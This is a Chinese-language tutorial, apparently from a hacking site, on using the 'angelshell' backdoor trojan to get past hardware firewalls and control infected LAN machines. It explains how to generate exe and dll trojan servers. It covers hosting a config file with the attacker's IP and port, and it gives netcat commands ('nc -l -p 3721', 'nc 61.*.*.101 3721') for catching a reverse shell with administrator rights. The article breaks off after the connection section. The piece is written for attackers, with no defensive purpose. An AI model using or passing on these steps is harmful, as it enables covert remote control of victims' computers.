上一篇：QQ大盗传播技术分析及防范

秘密穿过内网防火墙

小天最近利用微软新爆出的几个漏洞，放出很多c/s木马，但捕获的“肉鸡”却是少之又少，让他郁闷不已。原来，很多中招者都是fttp+lan环境下的局域网用户，在小天与被攻击者之间隔有硬件防火墙，而采用ip直连的方法当然是行不通的。此时，他想到了一位法力无边的 “天使”angelshell……
　　　木马档案　　木马代号：angelshell 　　木马版本：ver 1.0
　　　木马特长：支持正/反双向连接，可生成exe和dll两种服务端，能够转发肉鸡的任意端口到本地机器。
　　　对于广大攻击者而言，突破硬件防火墙无异于将一把利剑插入攻击对象的咽喉，这正是笔者今天要介绍的主角“angelshell”的厉害之处。大家都知道，能够穿过硬件防火墙的后门程序非常少。然而，angelshell不仅可以穿过硬件防火墙实现反向连接，还可让所有正向连接的程序都实现反向连接。
　　　下面，笔者就带大家一同迈向“天使”所开启的后门（本文试验的肉鸡ip地址为61.*.*.101，笔者入侵用机的ip为61.*.*.157），看完本文大家会对angelshell的使用方法有一个比较系统的了解。全文将分为“配置、连接、端口转发”三个部分来为读者讲解“天使”angelshell 的应用。

要想穿过硬件防火墙，这位天使需要极其强大的能量。因此，在让我们的天使发挥威力之前，先给它一点时间做好准备工作。让我们的天使积蓄能量吧。
　　　在这一部分，笔者将向大家介绍angelshell的基本设置。
　　　首先我们来了解一下“天使”的组成部分。angelshell的核心程序包含3个文件，它们分别是angelshell.exe、fport.exe、 fportclient.exe。另外，最后连接肉鸡的工作还需要请出nc.exe来配合完成，也就是大家熟悉的“瑞士军刀”。
　　　现在，笔者介绍一下它们的作用，以及它们是如何相互配合控制内网肉鸡的。
　　　木马程序的生成要靠angelshell.exe来完成，它被用于生成服务端的。在运行angelshell.exe后，出现如图所示的窗口，在这里我们可设置连接端口（默认为3721）和连接密码，并在“反向连接信息”中填写好存放反向连接信息文件“angel.ini”的网络地址http: //www.***.com/angel.ini。填写妥当后，生成需要的服务端即可（dll或exe），其作用自然是让对方在运行后自动开启一个后门，以便进一步的入侵。
　　　 fportclient.exe则是被用来进行端口转发的客户端，它可以把远程计算机的任意端口反向模拟到本地机器来。
　　　因为反向连接需要控制者的ip地址和端口信息，而不同用户的ip地址和想要设置的端口是不同的，所以angel.ini文件就需要手动编写并上传到自己的网络服务空间。格式如下：在第一行填写自己机器的ip地址（如“61.*.*.157），第二行写上nc.exe监听的端口，也就是肉鸡用来自动连接的端口（如3721）。其作用是，一旦肉鸡运行了木马程序，我们只要在自己的机器上用nc.exe监听3721端口，就可以让肉鸡上钩。

　　当肉鸡经不住天使的诱惑而上钩时，我们就可潜入肉鸡的硬盘之中。当然，要想能控制好我们的天使，还得依靠瑞士军刀的帮助。
　　　我们要用到telnet连接和端口监听功能。如果肉鸡已经运行了刚才所生成的木马程序，我们可以使用以下方法来连接肉鸡。
　　　 nc正向连接的格式为“nc ip 端口”，如“nc 61.*.*.101 3721”；反向连接的格式则为“nc -l -p 监听端口”，如“nc -l -p 3721”。不论你用何种方式连接成功后，都会显示banner欢迎信息，此时输入先前设定的密码，成功的话就可以得到一个拥有管理员权限的命令提示符操作界面（cmd shell），登录成功后会显示angelshell的帮助信息和附加功能说明。

（）

下一篇：网页木马制作小结

↓相关文章：